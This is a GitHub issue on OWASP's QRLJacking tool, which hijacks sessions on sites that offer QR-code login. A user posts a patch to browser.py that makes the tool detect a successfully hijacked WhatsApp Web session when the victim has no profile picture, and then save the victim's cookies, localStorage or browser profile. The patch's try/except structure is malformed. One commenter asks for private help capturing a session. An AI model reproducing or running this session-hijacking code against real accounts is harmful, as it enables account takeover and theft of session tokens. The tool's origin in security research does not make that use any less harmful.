search

OWASP / QRLJacking

QRLJacking or Quick Response Code Login Jacking is a simple-but-nasty attack vector affecting all the applications that relays on “Login with QR code” feature as a secure way to login into accounts which aims for hijacking users session by attackers.
GNU General Public License v3.0
1.33k stars 619 forks source link

If user has no profile picture the change_identifier is different and wouldn't work [Made temp fix] #236

Open danieldev-gh opened 6 months ago

danieldev-gh commented 6 months ago

when the hijacked user's profile picture is the default, its not an img element and the xPath is different its this: /html/body/div[1]/div/div[2]/div[3]/header/div[1]/div/div/span instead of this /html/body/div[1]/div/div/div[4]/header/div[1]/div/img

I made a temporary fix in browser.py

try: 
    identifier = controller.find_element(By.XPATH, change_identifier)
    if identifier:
        # If the identifier is found the attack has 
        # been successful
        print()
        status(f"Got session on {module_name} module")
        if session_type.lower() == "localstorage":
            self.save_localstorage(module_name)
        elif session_type.lower() == "cookies":
            self.save_cookie(module_name)
        else:
            self.save_profile(module_name)

        if Settings.verbose:
            status("Resetting browser cookies and localStorage to start over..")

        if not session_type.lower() == "profile":
            controller.delete_all_cookies()
            controller.execute_script("window.localStorage.clear()")
            controller.refresh()
            if Settings.verbose:
                status("Session reset successfully")
            time.sleep(5)
        else:
             # Identifier found! Can now close the
             # session and stop listening
            self.close_job(module_name)
            self.close_all()
    else:
        time.sleep(5)
    except:
    # Identifier not found: wait end continue listening
    try:
        identifier2 = controller.find_element(By.XPATH, "/html/body/div[1]/div/div[2]/div[3]/header/div[1]/div/div/span")
        if identifier2:
            # If the identifier is found the attack has 
            # been successful
            print()
            status(f"Got session on {module_name} module")
            if session_type.lower() == "localstorage":
                self.save_localstorage(module_name)
            elif session_type.lower() == "cookies":
                self.save_cookie(module_name)
            else:
                self.save_profile(module_name)

            if Settings.verbose:
                status("Resetting browser cookies and localStorage to start over..")

            if not session_type.lower() == "profile":
                controller.delete_all_cookies()
                controller.execute_script("window.localStorage.clear()")
                controller.refresh()
                if Settings.verbose:
                    status("Session reset successfully")
                time.sleep(5)
            else:
                # Identifier found! Can now close the
                # session and stop listening
                self.close_job(module_name)
                self.close_all()
        else:
            time.sleep(5)
    except:
        time.sleep(5)

I had the same issue as #206

dr1408 commented 5 months ago

Sir I tried to hack my whatsapp I'm using a profile pic + I didn't do your edit yet still no session captured?

dr1408 commented 5 months ago

Sir i need your help can i contact you